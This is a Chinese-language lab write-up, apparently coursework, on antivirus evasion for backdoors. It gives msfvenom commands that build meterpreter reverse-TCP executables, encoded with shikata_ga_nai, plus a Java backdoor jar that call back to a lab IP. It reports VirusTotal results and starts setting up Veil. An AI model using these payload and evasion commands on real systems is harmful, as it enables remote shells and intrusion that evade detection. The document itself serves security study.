目录
实践内容
裸奔的后门程序
在线检测:Virus Total www.virustotal.com
在正式开始实验之前,我们先看一下没有做免杀的后门程序在各个杀毒引擎面前的表现
方法
MSF编码器编码
- 编码1次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.137.130 LPORT=8888 -f exe > met-encoded.exe
检测met-encoded.exe,结果没什么变化
- 编码10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.130 LPORT=8888 -f exe > met-encoded.exe
检测met-encoded.exe,结果依旧没什么变化
- 原因
因为shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,AV厂商盯住这部分就可以了。而且,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。
msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=8888 x> backdoor_java.jar
检测backdoor_java.jar,结果不错
veil
常规方法:apt-get install veil-evasion,不过我尝试了很久很久也没成功,没耐心继续搞了,就换了种方法。惊喜的发现veil的docker镜像。